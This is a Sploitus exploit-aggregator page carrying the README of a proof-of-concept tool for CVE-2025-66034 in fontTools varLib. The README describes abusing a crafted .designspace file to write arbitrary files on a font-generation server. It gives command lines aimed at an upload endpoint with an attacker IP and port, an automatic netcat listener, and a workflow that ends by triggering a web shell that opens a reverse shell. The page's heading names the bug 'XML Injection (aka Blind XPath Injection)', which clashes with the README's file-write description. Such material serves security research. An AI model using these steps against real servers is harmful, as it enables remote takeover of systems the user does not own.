Sploitus

Exploit for XML Injection (aka Blind XPath Injection) in Fonttools

githubexploit · 2026-03-15

Exploit Code

README119 lines
## https://sploitus.com/exploit?id=9A353868-7423-5B9C-86C4-87ABDF2D662A
# fontTools varLib CVE-2025-66034 Exploit

<p align="center">
  <img alt="cve" src="https://img.shields.io/badge/CVE-2025--66034-critical">
  <img alt="component" src="https://img.shields.io/badge/component-fontTools%20varLib-orange">
  <img alt="vulnerability" src="https://img.shields.io/badge/vulnerability-Arbitrary%20File%20Write-red">
  <img alt="vector" src="https://img.shields.io/badge/vector-.designspace%20Payload-yellow">
  <img alt="impact" src="https://img.shields.io/badge/impact-Remote%20Code%20Execution-critical">
  <img alt="language" src="https://img.shields.io/badge/language-Python-blue">
  <img alt="dependency" src="https://img.shields.io/badge/dependency-fontTools-lightgrey">
  <img alt="license" src="https://img.shields.io/badge/license-MIT-green">
</p>

This repo doesn't introduce a new vulnerability.

This is a Proof-of-concept exploit for **CVE-2025-66034** affecting the fontTools varLib variable font generation pipeline.

The vulnerability allows attackers to control the output filename inside a crafted `.designspace` file. When processed by a vulnerable font generation service, this can lead to arbitrary file write on the server filesystem.

The script **`varlib_cve_2025_66034.py`** automates payload creation, font generation, upload, and optional shell triggering.

---

## Features

- Automatic creation of compatible master fonts using fontTools
- Randomized shell filename generation
- Customizable target path and upload endpoint
- Automatic `nc` listener
- No manual font preparation required

---

## Requirements

Python **3.9+**

Install dependencies:

```bash
pip install fonttools requests
```

Netcat is required for the listener:

---

## Usage

**If your target is a self-hosted lab running on mysite.com, and the upload path, filesystem write path, and web-accessible trigger path match the defaults in the script, you can run it directly.**

Basic usage:

```bash
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>
```

**Highly likely the target uses different URLs or filesystem paths, override the defaults with the available options below, such as --url, --path, and --trigger or modify script manually**

**Note:** the multipart upload form names may vary depending on the environment. If the target does not use the same form field names as the script, adjust them in the `files` section before running the exploit.

## Options

| Argument | Description |
|--------|--------|
| `--ip` | Attacker listener IP |
| `--port` | Listener port |
| `--path` | Target filesystem path where the file will be written (must be web-accessible to trigger a web shell) |
| `--url` | Upload endpoint, form may vary |
| `--trigger` | Base URL used to trigger the written payload after upload |
| `--no-listen` | Disable automatic netcat listener |

Example with custom options:

```bash
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com
```

---

## Exploit Workflow

1. Generate compatible master fonts
2. Create malicious `.designspace` file
3. Upload payload via multipart POST
4. Write arbitrary file on the server
5. Trigger the payload via HTTP request

---

## Credits / Acknowledgements

Special thanks and respect to:

- The fontTools project maintainers and contributors for their work on the open-source fontTools library.
- The security researchers who discovered and responsibly disclosed **CVE-2025-66034**.
- The open-source security community for documenting and analyzing vulnerabilities that help improve software security.

This proof-of-concept is provided for educational and research purposes to help understand the vulnerability and its impact.

---

## Disclaimer

This code is provided **for educational and research purposes only**.

Do not use this exploit against systems you do not own or have explicit permission to test.

The author is not responsible for misuse or damage caused by this software.

---

## References

- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
- GitHub Advisory: https://github.com/advisories/GHSA-768j-98cg-p3fv
- fontTools Project: https://github.com/fonttools/fonttools
- fontTools Documentation: https://fonttools.readthedocs.io/